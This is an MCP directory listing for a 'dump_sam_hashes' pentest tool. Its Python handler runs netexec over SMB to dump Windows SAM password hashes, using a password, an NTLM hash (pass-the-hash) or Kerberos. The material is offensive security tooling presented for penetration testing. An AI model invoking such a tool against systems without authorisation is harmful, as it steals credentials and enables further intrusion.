Skip to main content
Glama

dump_sam_hashes

Extract SAM database hashes from Windows systems using credentials or NTLM hashes for security testing and password analysis during penetration testing.

Instructions

dump sam hashes if we have some redentials using the sec dump which is similar to secretdump,use ntlm hash or normal password

Input Schema

TableJSON Schema
NameRequiredDescriptionDefault
ipsYes
usernameYes
passwordYes
ntlmNo
kerberosNo

Implementation Reference

  • The handler function for the 'dump_sam_hashes' tool. It executes netexec smb with --sam secdump option using NTLM hash, Kerberos, or password authentication to dump SAM hashes.
    def dump_sam_hashes(ips:List[str],username:str,password:str,ntlm:bool=False,kerberos:bool=False): if (ntlm): return run_command(["netexec","smb"]+ips+["-u",username,"-H",password,"--sam","secdump"]) elif(kerberos): return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,'-k',"--sam","secdump"]) else: return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,"--sam","secdump"])
  • Registers the 'dump_sam_hashes' tool with MCP using the @mcp.tool decorator, including name, description, and implicit schema from function parameters.
    @mcp.tool(name="dump_sam_hashes",description="dump sam hashes if we have some redentials using the sec dump which is similar to secretdump,use ntlm hash or normal password")

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/YoussefSahnoun/PentestMCP'

If you have feedback or need assistance with the MCP directory API, please join our Discord server